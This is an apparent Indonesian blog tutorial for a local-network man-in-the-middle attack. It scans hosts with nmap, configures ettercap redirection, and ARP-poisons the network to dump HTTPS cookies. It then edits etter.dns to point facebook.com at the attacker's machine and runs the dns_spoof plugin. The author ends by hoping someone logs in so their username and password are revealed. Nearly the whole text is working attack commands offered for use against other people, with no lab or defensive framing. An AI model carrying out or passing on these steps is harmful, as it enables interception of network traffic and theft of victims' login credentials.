Pertama kita scan host dulu
nmap -sn -n 192.168.1.1/24 ===>scan host
seting /etc/etter.conf
## tambahkan komen ini di file di atas ##
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Dump traffic pada ARP ( sniffing – dump cookies https )
Command : ettercap -T -w dump -i wlan0 -M ARP /xxx.xxx.x.x/ //
Kemudian config jalur yang akan di spoof nantinya yang di konfigurasikan pada file etter.dns. Lokasi file etter.dns secara default pada backtrack V R1
etter.dns berada di /usr/local/share/ettercap/etter.dns atau /usr/share/ettercap/etter.dns
facebook.com A 192.168.1.6 ===> ip attacker
*.facebook.com A 192.168.1.6
www.facebook.com PTR 192.168.1.6 # Wildcards in PTR are not allowed
Edit ip address dengan ip address pengganti , dalam hal ini saya menggunakan ip address yang di gunakan os backtrack yaitu 192.168.1.6, dan hasilnya akan mengarahkan domain facebook.com dan www.facebook.com ke ip address 192.168.1.6
Syntax ettercap dengan plugin dns_spoof
kemudian jalankan dengan perintah
ettercap -T -q -i wlan0 -P dns_spoof -M ARP // //
hihi semoga berhasil :D
moga-moga ada yang login , ntar ketahuan tuh user and passwordnya
0 comments